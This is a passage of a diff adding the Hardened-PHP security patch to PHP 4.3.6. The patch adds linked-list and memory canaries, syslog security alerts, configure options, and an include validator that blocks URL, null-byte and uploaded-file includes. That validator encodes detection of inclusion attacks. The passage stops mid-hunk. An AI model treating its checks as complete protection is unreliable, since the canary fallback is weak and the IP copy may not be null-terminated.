+diff -Nur php-4.3.6.orig/Zend/zend_execute.c hardened-php/Zend/zend_execute.c
+--- php-4.3.6.orig/Zend/zend_execute.c  Fri Apr 16 19:25:37 2004
++++ hardened-php/Zend/zend_execute.c    Sun May 16 00:33:40 2004
+@@ -2137,7 +2137,12 @@
+                                                                int dummy = 1;
+                                                                zend_file_handle file_handle = {0};
+ 
++#if HARDENED_PHP_INC_PROTECT
++                                                               if (zend_is_valid_include(inc_filename) 
++                                                                               && zend_open(inc_filename->value.str.val, &file_handle) == SUCCESS
++#else
+                                                                if (zend_open(inc_filename->value.str.val, &file_handle) == SUCCESS
++#endif
+                                                                                && ZEND_IS_VALID_FILE_HANDLE(&file_handle)) {
+ 
+                                                                        file_handle.filename = inc_filename->value.str.val;
+@@ -2166,6 +2171,11 @@
+                                                        break;
+                                                case ZEND_INCLUDE:
+                                                case ZEND_REQUIRE:
++#if HARDENED_PHP_INC_PROTECT
++                                                       if (!zend_is_valid_include(inc_filename)) {
++                                                               break;
++                                                       }
++#endif
+                                                        new_op_array = compile_filename(EX(opline)->op2.u.constant.value.lval, inc_filename TSRMLS_CC);
+                                                        break;
+                                                case ZEND_EVAL: {
+diff -Nur php-4.3.6.orig/Zend/zend_globals.h hardened-php/Zend/zend_globals.h
+--- php-4.3.6.orig/Zend/zend_globals.h  Fri Apr 16 19:25:37 2004
++++ hardened-php/Zend/zend_globals.h    Sun May 16 00:33:40 2004
+@@ -229,6 +229,14 @@
+        int cache_stats[MAX_CACHED_MEMORY][2];
+        int fast_cache_stats[MAX_FAST_CACHE_TYPES][2];
+ #endif
++#if HARDENED_PHP_MM_PROTECT
++       unsigned int canary_1;
++       unsigned int canary_2;
++#endif
++#if HARDENED_PHP_LL_PROTECT
++       unsigned int canary_3;
++       unsigned int canary_4;
++#endif
+ #if MEMORY_LIMIT
+        unsigned int memory_limit;
+        unsigned int allocated_memory;
+diff -Nur php-4.3.6.orig/Zend/zend_hash.c hardened-php/Zend/zend_hash.c
+--- php-4.3.6.orig/Zend/zend_hash.c     Fri Apr 16 19:25:37 2004
++++ hardened-php/Zend/zend_hash.c       Sun May 16 00:33:40 2004
+@@ -447,7 +447,7 @@
+        IS_CONSISTENT(ht);
+ 
+        if ((ht->nTableSize << 1) > 0) {        /* Let's double the table size */
+-               t = (Bucket **) perealloc_recoverable(ht->arBuckets, (ht->nTableSize << 1) * sizeof(Bucket *), ht->persistent);
++               t = (Bucket **) perealloc(ht->arBuckets, (ht->nTableSize << 1) * sizeof(Bucket *), ht->persistent);
+                if (t) {
+                        HANDLE_BLOCK_INTERRUPTIONS();
+                        ht->arBuckets = t;
+@@ -457,6 +457,7 @@
+                        HANDLE_UNBLOCK_INTERRUPTIONS();
+                        return SUCCESS;
+                }
++               zend_error(E_ERROR, "zend_hash_do_resize - out of memory");
+                return FAILURE;
+        }
+        return SUCCESS;
+diff -Nur php-4.3.6.orig/Zend/zend_llist.c hardened-php/Zend/zend_llist.c
+--- php-4.3.6.orig/Zend/zend_llist.c    Fri Apr 16 19:25:37 2004
++++ hardened-php/Zend/zend_llist.c      Sun May 16 00:33:40 2004
+@@ -21,9 +21,34 @@
+ #include "zend.h"
+ #include "zend_llist.h"
+ #include "zend_qsort.h"
++#include "zend_globals.h"
++
++#define CHECK_LIST_CANARY(list) \
++       if (AG(canary_3) != (list)->canary_h || AG(canary_4) != (list)->canary_t) { \
++               zend_security_log("linked list canary was overwritten"); \
++               exit(1); \
++       }
++
++#define CHECK_LISTELEMENT_CANARY(elem) \
++       if (AG(canary_3) != (elem)->canary) { \
++               zend_security_log("linked list element canary was overwritten"); \
++               exit(1); \
++       }
++
+ 
+ ZEND_API void zend_llist_init(zend_llist *l, size_t size, llist_dtor_func_t dtor, unsigned char persistent)
+ {
++#if HARDENED_PHP_LL_PROTECT
++       static int ll_canary_inited = 0;
++       
++       if (!ll_canary_inited) {
++               AG(canary_3) = zend_canary();
++               AG(canary_4) = zend_canary();
++               ll_canary_inited = 1;
++       }
++       l->canary_h = AG(canary_3);
++       l->canary_t = AG(canary_4);
++#endif
+        l->head  = NULL;
+        l->tail  = NULL;
+        l->count = 0;
+@@ -37,6 +62,10 @@
+ {
+        zend_llist_element *tmp = pemalloc(sizeof(zend_llist_element)+l->size-1, l->persistent);
+ 
++#if HARDENED_PHP_LL_PROTECT
++       CHECK_LIST_CANARY(l)
++       tmp->canary = AG(canary_3);
++#endif
+        tmp->prev = l->tail;
+        tmp->next = NULL;
+        if (l->tail) {
+@@ -55,6 +84,10 @@
+ {
+        zend_llist_element *tmp = pemalloc(sizeof(zend_llist_element)+l->size-1, l->persistent);
+ 
++#if HARDENED_PHP_LL_PROTECT
++       CHECK_LIST_CANARY(l)
++       tmp->canary = AG(canary_3);
++#endif
+        tmp->next = l->head;
+        tmp->prev = NULL;
+        if (l->head) {
+@@ -91,10 +124,19 @@
+        zend_llist_element *current=l->head;
+        zend_llist_element *next;
+ 
++#if HARDENED_PHP_LL_PROTECT
++       CHECK_LIST_CANARY(l)
++#endif
+        while (current) {
++#if HARDENED_PHP_LL_PROTECT
++               CHECK_LISTELEMENT_CANARY(current)
++#endif
+                next = current->next;
+                if (compare(current->data, element)) {
+                        DEL_LLIST_ELEMENT(current, l);
++#if HARDENED_PHP_LL_PROTECT
++                       current->canary = 0;
++#endif
+                        break;
+                }
+                current = next;
+@@ -106,7 +148,13 @@
+ {
+        zend_llist_element *current=l->head, *next;
+        
++#if HARDENED_PHP_LL_PROTECT
++       CHECK_LIST_CANARY(l)
++#endif
+        while (current) {
++#if HARDENED_PHP_LL_PROTECT
++               CHECK_LISTELEMENT_CANARY(current)
++#endif
+                next = current->next;
+                if (l->dtor) {
+                        l->dtor(current->data);
+@@ -131,7 +179,13 @@
+        zend_llist_element *old_tail;
+        void *data;
+ 
++#if HARDENED_PHP_LL_PROTECT
++       CHECK_LIST_CANARY(l)
++#endif
+        if ((old_tail = l->tail)) {
++#if HARDENED_PHP_LL_PROTECT
++               CHECK_LISTELEMENT_CANARY(old_tail)
++#endif
+                if (l->tail->prev) {
+                        l->tail->prev->next = NULL;
+                }
+@@ -157,9 +211,15 @@
+ {
+        zend_llist_element *ptr;
+ 
++#if HARDENED_PHP_LL_PROTECT
++       CHECK_LIST_CANARY(src)
++#endif
+        zend_llist_init(dst, src->size, src->dtor, src->persistent);
+        ptr = src->head;
+        while (ptr) {
++#if HARDENED_PHP_LL_PROTECT
++               CHECK_LISTELEMENT_CANARY(ptr)
++#endif
+                zend_llist_add_element(dst, ptr->data);
+                ptr = ptr->next;
+        }
+@@ -170,11 +230,20 @@
+ {
+        zend_llist_element *element, *next;
+ 
++#if HARDENED_PHP_LL_PROTECT
++       CHECK_LIST_CANARY(l)
++#endif
+        element=l->head;
+        while (element) {
++#if HARDENED_PHP_LL_PROTECT
++               CHECK_LISTELEMENT_CANARY(element)
++#endif
+                next = element->next;
+                if (func(element->data)) {
+                        DEL_LLIST_ELEMENT(element, l);
++#if HARDENED_PHP_LL_PROTECT
++                       element->canary = 0;
++#endif
+                }
+                element = next;
+        }
+@@ -185,7 +254,13 @@
+ {
+        zend_llist_element *element;
+ 
++#if HARDENED_PHP_LL_PROTECT
++       CHECK_LIST_CANARY(l)
++#endif
+        for (element=l->head; element; element=element->next) {
++#if HARDENED_PHP_LL_PROTECT
++               CHECK_LISTELEMENT_CANARY(element)
++#endif
+                func(element->data TSRMLS_CC);
+        }
+ }
+@@ -197,6 +272,9 @@
+        zend_llist_element **elements;
+        zend_llist_element *element, **ptr;
+ 
++#if HARDENED_PHP_LL_PROTECT
++       CHECK_LIST_CANARY(l)
++#endif
+        if (l->count <= 0) {
+                return;
+        }
+@@ -206,6 +284,9 @@
+        ptr = &elements[0];
+ 
+        for (element=l->head; element; element=element->next) {
++#if HARDENED_PHP_LL_PROTECT
++               CHECK_LISTELEMENT_CANARY(element)
++#endif
+                *ptr++ = element;
+        }
+ 
+@@ -228,7 +309,13 @@
+ {
+        zend_llist_element *element;
+ 
++#if HARDENED_PHP_LL_PROTECT
++       CHECK_LIST_CANARY(l)
++#endif
+        for (element=l->head; element; element=element->next) {
++#if HARDENED_PHP_LL_PROTECT
++               CHECK_LISTELEMENT_CANARY(element)
++#endif
+                func(element->data, arg TSRMLS_CC);
+        }
+ }
+@@ -239,8 +326,14 @@
+        zend_llist_element *element;
+        va_list args;
+ 
++#if HARDENED_PHP_LL_PROTECT
++       CHECK_LIST_CANARY(l)
++#endif
+        va_start(args, num_args);
+        for (element=l->head; element; element=element->next) {
++#if HARDENED_PHP_LL_PROTECT
++               CHECK_LISTELEMENT_CANARY(element)
++#endif
+                func(element->data, num_args, args TSRMLS_CC);
+        }
+        va_end(args);
+@@ -249,6 +342,9 @@
+ 
+ ZEND_API int zend_llist_count(zend_llist *l)
+ {
++#if HARDENED_PHP_LL_PROTECT
++       CHECK_LIST_CANARY(l)
++#endif
+        return l->count;
+ }
+     
+@@ -256,8 +352,14 @@
+ {
+        zend_llist_position *current = pos ? pos : &l->traverse_ptr;
+ 
++#if HARDENED_PHP_LL_PROTECT
++       CHECK_LIST_CANARY(l)
++#endif
+        *current = l->head;
+        if (*current) {
++#if HARDENED_PHP_LL_PROTECT
++               CHECK_LISTELEMENT_CANARY(*current)
++#endif
+                return (*current)->data;
+        } else {
+                return NULL;
+@@ -269,8 +371,14 @@
+ {
+        zend_llist_position *current = pos ? pos : &l->traverse_ptr;
+ 
++#if HARDENED_PHP_LL_PROTECT
++       CHECK_LIST_CANARY(l)
++#endif
+        *current = l->tail;
+        if (*current) {
++#if HARDENED_PHP_LL_PROTECT
++               CHECK_LISTELEMENT_CANARY(*current)
++#endif
+                return (*current)->data;
+        } else {
+                return NULL;
+@@ -282,9 +390,18 @@
+ {
+        zend_llist_position *current = pos ? pos : &l->traverse_ptr;
+ 
++#if HARDENED_PHP_LL_PROTECT
++       CHECK_LIST_CANARY(l)
++#endif
+        if (*current) {
++#if HARDENED_PHP_LL_PROTECT
++               CHECK_LISTELEMENT_CANARY(*current)
++#endif
+                *current = (*current)->next;
+                if (*current) {
++#if HARDENED_PHP_LL_PROTECT
++                       CHECK_LISTELEMENT_CANARY(*current)
++#endif
+                        return (*current)->data;
+                }
+        }
+@@ -296,9 +413,18 @@
+ {
+        zend_llist_position *current = pos ? pos : &l->traverse_ptr;
+ 
++#if HARDENED_PHP_LL_PROTECT
++       CHECK_LIST_CANARY(l)
++#endif
+        if (*current) {
++#if HARDENED_PHP_LL_PROTECT
++               CHECK_LISTELEMENT_CANARY(*current)
++#endif
+                *current = (*current)->prev;
+                if (*current) {
++#if HARDENED_PHP_LL_PROTECT
++                       CHECK_LISTELEMENT_CANARY(*current)
++#endif
+                        return (*current)->data;
+                }
+        }
+diff -Nur php-4.3.6.orig/Zend/zend_llist.h hardened-php/Zend/zend_llist.h
+--- php-4.3.6.orig/Zend/zend_llist.h    Fri Apr 16 19:25:37 2004
++++ hardened-php/Zend/zend_llist.h      Sun May 16 00:33:40 2004
+@@ -24,6 +24,9 @@
+ #include <stdlib.h>
+ 
+ typedef struct _zend_llist_element {
++#if HARDENED_PHP_LL_PROTECT
++       unsigned int canary;
++#endif 
+        struct _zend_llist_element *next;
+        struct _zend_llist_element *prev;
+        char data[1]; /* Needs to always be last in the struct */
+@@ -36,6 +39,9 @@
+ typedef void (*llist_apply_func_t)(void * TSRMLS_DC);
+ 
+ typedef struct _zend_llist {
++#if HARDENED_PHP_LL_PROTECT
++       unsigned int canary_h; /* head */
++#endif 
+        zend_llist_element *head;
+        zend_llist_element *tail;
+        size_t size;
+@@ -43,6 +49,9 @@
+        llist_dtor_func_t dtor;
+        unsigned char persistent;
+        zend_llist_element *traverse_ptr;
++#if HARDENED_PHP_LL_PROTECT
++       unsigned int canary_t; /* tail */
++#endif 
+ } zend_llist;
+ 
+ typedef zend_llist_element* zend_llist_position;
+diff -Nur php-4.3.6.orig/configure hardened-php/configure
+--- php-4.3.6.orig/configure    Fri Apr 16 19:25:50 2004
++++ hardened-php/configure      Sun May 16 00:33:40 2004
+@@ -389,6 +389,14 @@
+ ac_default_prefix=/usr/local
+ # Any additions from configure.in:
+ ac_help="$ac_help
++  --disable-hardened-php-mm-protect    Disable the Memory Manager protection."
++ac_help="$ac_help
++  --disable-hardened-php-ll-protect    Disable the Linked List protection."
++ac_help="$ac_help
++  --disable-hardened-php-inc-protect   Disable include/require protection."
++ac_help="$ac_help
++  --disable-hardened-php-fmt-protect   Disable format string protection."
++ac_help="$ac_help
+ 
+ SAPI modules:
+ "
+@@ -2643,6 +2651,128 @@
+ 
+ 
+ 
++# Check whether --enable-hardened-php-mm-protect or --disable-hardened-php-mm-protect was given.
++if test "${enable_hardened_php_mm_protect+set}" = set; then
++  enableval="$enable_hardened_php_mm_protect"
++  
++  DO_HARDENED_PHP_MM_PROTECT=$enableval
++
++else
++  
++  DO_HARDENED_PHP_MM_PROTECT=yes
++
++fi
++
++
++# Check whether --enable-hardened-php-ll-protect or --disable-hardened-php-ll-protect was given.
++if test "${enable_hardened_php_ll_protect+set}" = set; then
++  enableval="$enable_hardened_php_ll_protect"
++  
++  DO_HARDENED_PHP_LL_PROTECT=$enableval
++
++else
++  
++  DO_HARDENED_PHP_LL_PROTECT=yes
++
++fi
++
++
++# Check whether --enable-hardened-php-inc-protect or --disable-hardened-php-inc-protect was given.
++if test "${enable_hardened_php_inc_protect+set}" = set; then
++  enableval="$enable_hardened_php_inc_protect"
++  
++  DO_HARDENED_PHP_INC_PROTECT=$enableval
++
++else
++  
++  DO_HARDENED_PHP_INC_PROTECT=yes
++
++fi
++
++
++# Check whether --enable-hardened-php-fmt-protect or --disable-hardened-php-fmt-protect was given.
++if test "${enable_hardened_php_fmt_protect+set}" = set; then
++  enableval="$enable_hardened_php_fmt_protect"
++  
++  DO_HARDENED_PHP_FMT_PROTECT=$enableval
++
++else
++  
++  DO_HARDENED_PHP_FMT_PROTECT=yes
++
++fi
++
++
++echo $ac_n "checking whether to protect the Zend Memory Manager""... $ac_c" 1>&6
++echo "configure:2725: checking whether to protect the Zend Memory Manager" >&5
++echo "$ac_t""$DO_HARDENED_PHP_MM_PROTECT" 1>&6
++
++echo $ac_n "checking whether to protect the Zend Linked Lists""... $ac_c" 1>&6
++echo "configure:2729: checking whether to protect the Zend Linked Lists" >&5
++echo "$ac_t""$DO_HARDENED_PHP_LL_PROTECT" 1>&6
++
++echo $ac_n "checking whether to protect include/require statements""... $ac_c" 1>&6
++echo "configure:2733: checking whether to protect include/require statements" >&5
++echo "$ac_t""$DO_HARDENED_PHP_INC_PROTECT" 1>&6
++
++echo $ac_n "checking whether to protect PHP Format String functions""... $ac_c" 1>&6
++echo "configure:2737: checking whether to protect PHP Format String functions" >&5
++echo "$ac_t""$DO_HARDENED_PHP_FMT_PROTECT" 1>&6
++
++
++cat >> confdefs.h <<\EOF
++#define HARDENED_PHP 1
++EOF
++
++
++
++if test "$DO_HARDENED_PHP_MM_PROTECT" = "yes"; then
++  cat >> confdefs.h <<\EOF
++#define HARDENED_PHP_MM_PROTECT 1
++EOF
++
++else
++  cat >> confdefs.h <<\EOF
++#define HARDENED_PHP_MM_PROTECT 0
++EOF
++
++fi
++
++if test "$DO_HARDENED_PHP_LL_PROTECT" = "yes"; then
++  cat >> confdefs.h <<\EOF
++#define HARDENED_PHP_LL_PROTECT 1
++EOF
++
++else
++  cat >> confdefs.h <<\EOF
++#define HARDENED_PHP_LL_PROTECT 0
++EOF
++
++fi
++
++if test "$DO_HARDENED_PHP_INC_PROTECT" = "yes"; then
++  cat >> confdefs.h <<\EOF
++#define HARDENED_PHP_INC_PROTECT 1
++EOF
++
++else
++  cat >> confdefs.h <<\EOF
++#define HARDENED_PHP_INC_PROTECT 0
++EOF
++
++fi
++
++if test "$DO_HARDENED_PHP_FMT_PROTECT" = "yes"; then
++  cat >> confdefs.h <<\EOF
++#define HARDENED_PHP_FMT_PROTECT 1
++EOF
++
++else
++  cat >> confdefs.h <<\EOF
++#define HARDENED_PHP_FMT_PROTECT 0
++EOF
++
++fi
+ 
+ 
+ 
+@@ -94186,7 +94316,7 @@
+        php_ini.c SAPI.c rfc1867.c php_content_types.c strlcpy.c \
+        strlcat.c mergesort.c reentrancy.c php_variables.c php_ticks.c \
+        streams.c network.c php_open_temporary_file.c php_logos.c \
+-       output.c memory_streams.c user_streams.c; do
++       output.c memory_streams.c user_streams.c hardened_php.c; do
+   
+       IFS=.
+       set $ac_src
+@@ -94359,7 +94489,7 @@
+     zend_opcode.c zend_operators.c zend_ptr_stack.c zend_stack.c \
+     zend_variables.c zend.c zend_API.c zend_extensions.c zend_hash.c \
+     zend_list.c zend_indent.c zend_builtin_functions.c zend_sprintf.c \
+-    zend_ini.c zend_qsort.c zend_multibyte.c; do
++    zend_ini.c zend_qsort.c zend_multibyte.c zend_canary.c; do
+   
+       IFS=.
+       set $ac_src
+diff -Nur php-4.3.6.orig/configure.in hardened-php/configure.in
+--- php-4.3.6.orig/configure.in Fri Apr 16 19:25:50 2004
++++ hardened-php/configure.in   Sun May 16 00:33:40 2004
+@@ -205,7 +205,7 @@
+ sinclude(Zend/acinclude.m4)
+ sinclude(Zend/Zend.m4)
+ sinclude(TSRM/tsrm.m4)
+-
++sinclude(main/hardened_php.m4)
+ 
+ 
+ divert(2)
+@@ -1197,7 +1197,7 @@
+        php_ini.c SAPI.c rfc1867.c php_content_types.c strlcpy.c \
+        strlcat.c mergesort.c reentrancy.c php_variables.c php_ticks.c \
+        streams.c network.c php_open_temporary_file.c php_logos.c \
+-       output.c memory_streams.c user_streams.c)
++       output.c memory_streams.c user_streams.c hardened_php.c)
+ PHP_ADD_SOURCES(/main, internal_functions.c,, sapi)
+ PHP_ADD_SOURCES(/main, internal_functions_cli.c,, cli)
+ 
+@@ -1210,7 +1210,7 @@
+     zend_opcode.c zend_operators.c zend_ptr_stack.c zend_stack.c \
+     zend_variables.c zend.c zend_API.c zend_extensions.c zend_hash.c \
+     zend_list.c zend_indent.c zend_builtin_functions.c zend_sprintf.c \
+-    zend_ini.c zend_qsort.c zend_multibyte.c)
++    zend_ini.c zend_qsort.c zend_multibyte.c zend_canary.c)
+ 
+ if test -r "$abs_srcdir/Zend/zend_objects.c"; then
+   PHP_ADD_SOURCES(Zend, zend_objects.c zend_object_handlers.c zend_objects_API.c zend_mm.c)
+diff -Nur php-4.3.6.orig/main/SAPI.h hardened-php/main/SAPI.h
+--- php-4.3.6.orig/main/SAPI.h  Fri Apr 16 19:25:39 2004
++++ hardened-php/main/SAPI.h    Sun May 16 00:33:40 2004
+@@ -101,9 +101,14 @@
+        char *current_user;
+        int current_user_length;
+ 
+-    /* this is necessary for CLI module */
+-    int argc;
+-    char **argv;
++       /* this is necessary for CLI module */
++       int argc;
++       char **argv;
++       
++#if HARDENED_PHP
++       /* this is necessary for IP logging */
++       char ip_address[64];
++#endif
+ } sapi_request_info;
+ 
+ 
+diff -Nur php-4.3.6.orig/main/hardened_php.c hardened-php/main/hardened_php.c
+--- php-4.3.6.orig/main/hardened_php.c  Thu Jan  1 01:00:00 1970
++++ hardened-php/main/hardened_php.c    Sun May 16 00:38:41 2004
+@@ -0,0 +1,160 @@
++/*
++   +----------------------------------------------------------------------+
++   | PHP Version 4                                                        |
++   +----------------------------------------------------------------------+
++   | Copyright (c) 1997-2003 The PHP Group                                |
++   +----------------------------------------------------------------------+
++   | This source file is subject to version 2.02 of the PHP license,      |
++   | that is bundled with this package in the file LICENSE, and is        |
++   | available at through the world-wide-web at                           |
++   | http://www.php.net/license/2_02.txt.                                 |
++   | If you did not receive a copy of the PHP license and are unable to   |
++   | obtain it through the world-wide-web, please send a note to          |
++   | license@php.net so we can mail you a copy immediately.               |
++   +----------------------------------------------------------------------+
++   | Author: Stefan Esser <sesser@php.net>                        |
++   +----------------------------------------------------------------------+
++ */
++/* $Id: hardened_php.c,v 1.51.2.4 2003/03/17 13:50:23 wez Exp $ */
++
++#include "php.h"
++
++#include <stdio.h>
++#include <stdlib.h>
++
++#if HAVE_UNISTD_H
++#include <unistd.h>
++#endif
++#include "SAPI.h"
++#include "php_globals.h"
++
++#if HARDENED_PHP
++
++#ifdef HAVE_SYS_SOCKET_H
++#include <sys/socket.h>
++#endif
++
++#if defined(PHP_WIN32) || defined(__riscos__) || defined(NETWARE)
++#undef AF_UNIX
++#endif
++
++#if defined(AF_UNIX)
++#include <sys/un.h>
++#endif
++
++#define SYSLOG_PATH  "/dev/log"
++
++#include "snprintf.h"
++
++PHPAPI void php_security_log(char *str)
++{
++#if defined(AF_UNIX)
++       int s, r;
++       struct sockaddr_un sun;
++       char buf[1024];
++       
++       ap_php_snprintf(buf, 1024, "php security-alert: %s (attacker '%s')\n", str, SG(request_info).ip_address);
++       
++       s = socket(AF_UNIX, SOCK_DGRAM, 0);
++       if (s == -1) {
++               return;
++       }
++       
++       memset(&sun, 0, sizeof(sun));
++       sun.sun_family = AF_UNIX;
++       strcpy(sun.sun_path, SYSLOG_PATH);
++       /*sun.sun_len = sizeof(sun);*/
++       
++       r = connect(s, (struct sockaddr *)&sun, sizeof(sun));
++       if (r) {
++               close(s);
++               return;
++       }
++       send(s, buf, strlen(buf), 0);
++       
++       close(s);
++#endif
++}
++#endif
++
++#if HARDENED_PHP_MM_PROTECT || HARDENED_PHP_LL_PROTECT
++
++/* will be replaced later with more compatible method */
++PHPAPI unsigned int php_canary()
++{
++       time_t t;
++       unsigned int canary;
++       int fd;
++       
++       fd = open("/dev/urandom", 0);
++       if (fd != -1) {
++               int r = read(fd, &canary, sizeof(canary));
++               close(fd);
++               if (r == sizeof(canary)) {
++                       return (canary);
++               }
++       }
++       /* not good but we never want to do this */
++       time(&t);
++       canary = *(unsigned int *)&t + getpid() << 16;
++       return (canary);
++}
++#endif
++
++#if HARDENED_PHP_INC_PROTECT
++
++PHPAPI int php_is_valid_include(zval *z)
++{
++       char *filename;
++       int len;
++       TSRMLS_FETCH();
++       
++       /* must be of type string */
++       if (z->type != IS_STRING || z->value.str.val == NULL) {
++               return (0);
++       }
++       
++       /* short cut */
++       filename = z->value.str.val;
++       len = z->value.str.len;
++       
++       /* 1. must be shorter than MAXPATHLEN */
++       if (len > MAXPATHLEN) {
++               php_security_log("Include filename longer than MAXPATHLEN chars");
++               return (0);
++       }
++       
++       /* 2. must not be cutted */
++       if (len != strlen(filename)) {
++               php_security_log("Include filename has a \\0 cut");
++               return (0);
++       }
++       
++       /* 3. must not be a URL */
++       if (strstr(filename, "://")) {
++               php_security_log("Include filename is an URL");
++               return (0);
++       }
++       
++       /* 4. must not be an uploaded file */
++       if (SG(rfc1867_uploaded_files)) {
++               if (zend_hash_exists(SG(rfc1867_uploaded_files), (char *) filename, len+1)) {
++                       php_security_log("Include filename is an uploaded file");
++                       return (0);
++               }
++       }
++       
++       /* passed all tests */
++       return (1);
++}
++
++#endif
++
++/*
++ * Local variables:
++ * tab-width: 4
++ * c-basic-offset: 4
++ * End:
++ * vim600: sw=4 ts=4 fdm=marker
++ * vim<600: sw=4 ts=4
++ */
+diff -Nur php-4.3.6.orig/main/hardened_php.h hardened-php/main/hardened_php.h
+--- php-4.3.6.orig/main/hardened_php.h  Thu Jan  1 01:00:00 1970
++++ hardened-php/main/hardened_php.h    Sun May 16 00:33:40 2004
+@@ -0,0 +1,44 @@
++/*
++   +----------------------------------------------------------------------+
++   | PHP Version 4                                                        |
++   +----------------------------------------------------------------------+
++   | Copyright (c) 1997-2003 The PHP Group                                |
++   +----------------------------------------------------------------------+
++   | This source file is subject to version 2.02 of the PHP license,      |
++   | that is bundled with this package in the file LICENSE, and is        |
++   | available at through the world-wide-web at                           |
++   | http://www.php.net/license/2_02.txt.                                 |
++   | If you did not receive a copy of the PHP license and are unable to   |
++   | obtain it through the world-wide-web, please send a note to          |
++   | license@php.net so we can mail you a copy immediately.               |
++   +----------------------------------------------------------------------+
++   | Author:  Stefan Esser <sesser@php.net>                                |
++   +----------------------------------------------------------------------+
++*/
++
++
++#ifndef HARDENED_PHP_H
++#define HARDENED_PHP_H
++
++#include "zend.h"
++
++#if HARDENED_PHP
++PHPAPI void php_security_log(char *str);
++#endif
++
++#if HARDENED_PHP_MM_PROTECT || HARDENED_PHP_LL_PROTECT
++PHPAPI unsigned int php_canary();
++#endif
++
++#if HARDENED_PHP_INC_PROTECT
++PHPAPI int php_is_valid_include(zval *z);
++#endif
++
++#endif /* HARDENED_PHP_H */
++
++/*
++ * Local variables:
++ * tab-width: 4
++ * c-basic-offset: 4
++ * End:
++ */
+diff -Nur php-4.3.6.orig/main/hardened_php.m4 hardened-php/main/hardened_php.m4
+--- php-4.3.6.orig/main/hardened_php.m4 Thu Jan  1 01:00:00 1970
++++ hardened-php/main/hardened_php.m4   Sun May 16 00:33:40 2004
+@@ -0,0 +1,78 @@
++dnl
++dnl $Id: hardened_php.m4 Exp $
++dnl
++dnl This file contains Hardened-PHP specific autoconf functions.
++dnl
++
++AC_ARG_ENABLE(hardened-php-mm-protect,
++[  --disable-hardened-php-mm-protect    Disable the Memory Manager protection.],[
++  DO_HARDENED_PHP_MM_PROTECT=$enableval
++],[
++  DO_HARDENED_PHP_MM_PROTECT=yes
++])
++
++AC_ARG_ENABLE(hardened-php-ll-protect,
++[  --disable-hardened-php-ll-protect    Disable the Linked List protection.],[
++  DO_HARDENED_PHP_LL_PROTECT=$enableval
++],[
++  DO_HARDENED_PHP_LL_PROTECT=yes
++])
++
++AC_ARG_ENABLE(hardened-php-inc-protect,
++[  --disable-hardened-php-inc-protect   Disable include/require protection.],[
++  DO_HARDENED_PHP_INC_PROTECT=$enableval
++],[
++  DO_HARDENED_PHP_INC_PROTECT=yes
++])
++
++AC_ARG_ENABLE(hardened-php-fmt-protect,
++[  --disable-hardened-php-fmt-protect   Disable format string protection.],[
++  DO_HARDENED_PHP_FMT_PROTECT=$enableval
++],[
++  DO_HARDENED_PHP_FMT_PROTECT=yes
++])
++
++AC_MSG_CHECKING(whether to protect the Zend Memory Manager)
++AC_MSG_RESULT($DO_HARDENED_PHP_MM_PROTECT)
++
++AC_MSG_CHECKING(whether to protect the Zend Linked Lists)
++AC_MSG_RESULT($DO_HARDENED_PHP_LL_PROTECT)
++
++AC_MSG_CHECKING(whether to protect include/require statements)
++AC_MSG_RESULT($DO_HARDENED_PHP_INC_PROTECT)
++
++AC_MSG_CHECKING(whether to protect PHP Format String functions)
++AC_MSG_RESULT($DO_HARDENED_PHP_FMT_PROTECT)
++
++
++AC_DEFINE(HARDENED_PHP, 1, [Hardened-PHP])
++
++
++if test "$DO_HARDENED_PHP_MM_PROTECT" = "yes"; then
++dnl  AC_DEFINE(HARDENED_PHP, 1, [Hardened-PHP])
++  AC_DEFINE(HARDENED_PHP_MM_PROTECT, 1, [Memory Manager Protection])
++else
++  AC_DEFINE(HARDENED_PHP_MM_PROTECT, 0, [Memory Manager Protection])
++fi
++
++if test "$DO_HARDENED_PHP_LL_PROTECT" = "yes"; then
++dnl    AC_DEFINE(HARDENED_PHP, 1, [Hardened-PHP])
++  AC_DEFINE(HARDENED_PHP_LL_PROTECT, 1, [Linked List Protection])
++else
++  AC_DEFINE(HARDENED_PHP_LL_PROTECT, 0, [Linked List Protection])
++fi
++
++if test "$DO_HARDENED_PHP_INC_PROTECT" = "yes"; then
++dnl    AC_DEFINE(HARDENED_PHP, 1, [Hardened-PHP])
++  AC_DEFINE(HARDENED_PHP_INC_PROTECT, 1, [Include/Require Protection])
++else
++  AC_DEFINE(HARDENED_PHP_INC_PROTECT, 0, [Include/Require Protection])
++fi
++
++if test "$DO_HARDENED_PHP_FMT_PROTECT" = "yes"; then
++dnl    AC_DEFINE(HARDENED_PHP, 1, [Hardened-PHP])
++  AC_DEFINE(HARDENED_PHP_FMT_PROTECT, 1, [Fmt String Protection])
++else
++  AC_DEFINE(HARDENED_PHP_FMT_PROTECT, 0, [Fmt String Protection])
++fi
++
+diff -Nur php-4.3.6.orig/main/main.c hardened-php/main/main.c
+--- php-4.3.6.orig/main/main.c  Fri Apr 16 19:25:39 2004
++++ hardened-php/main/main.c    Sun May 16 00:33:40 2004
+@@ -1103,6 +1103,12 @@
+        php_output_startup();
+        php_output_activate(TSRMLS_C);
+ 
++#if HARDENED_PHP_INC_PROTECT
++       zuf.is_valid_include = php_is_valid_include;
++#endif
++#if HARDENED_PHP
++       zuf.security_log_function = php_security_log;
++#endif
+        zuf.error_function = php_error_cb;
+        zuf.printf_function = php_printf;
+        zuf.write_function = php_body_write_wrapper;
+@@ -1306,6 +1312,9 @@
+  */
+ static inline void php_register_server_variables(TSRMLS_D)
+ {
++#if HARDENED_PHP
++       zval **remote_addr;
++#endif
+        zval *array_ptr=NULL;
+ 
+        ALLOC_ZVAL(array_ptr);
+@@ -1317,6 +1326,14 @@
+        if (sapi_module.register_server_variables) {
+                sapi_module.register_server_variables(array_ptr TSRMLS_CC);
+        }
++
++#if HARDENED_PHP
++       if (zend_hash_find(array_ptr->value.ht, "REMOTE_ADDR", sizeof("REMOTE_ADDR"), (void **) &remote_addr)==SUCCESS) {
++               strncpy(SG(request_info).ip_address, Z_STRVAL_PP(remote_addr), sizeof(SG(request_info).ip_address)); 
++       } else {
++               strcpy(SG(request_info).ip_address, "REMOTE_ADDR not set");
++       }
++#endif
+ 
+        /* PHP Authentication support */
+        if (SG(request_info).auth_user) {
+diff -Nur php-4.3.6.orig/main/php.h hardened-php/main/php.h
+--- php-4.3.6.orig/main/php.h   Fri Apr 16 19:25:39 2004
++++ hardened-php/main/php.h     Sun May 16 00:33:40 2004
+@@ -35,6 +35,7 @@
+ #include "zend_qsort.h"
+ #include "php_compat.h"
+ 
++
+ #include "zend_API.h"
+ 
+ #if PHP_BROKEN_SPRINTF
+@@ -230,7 +231,7 @@
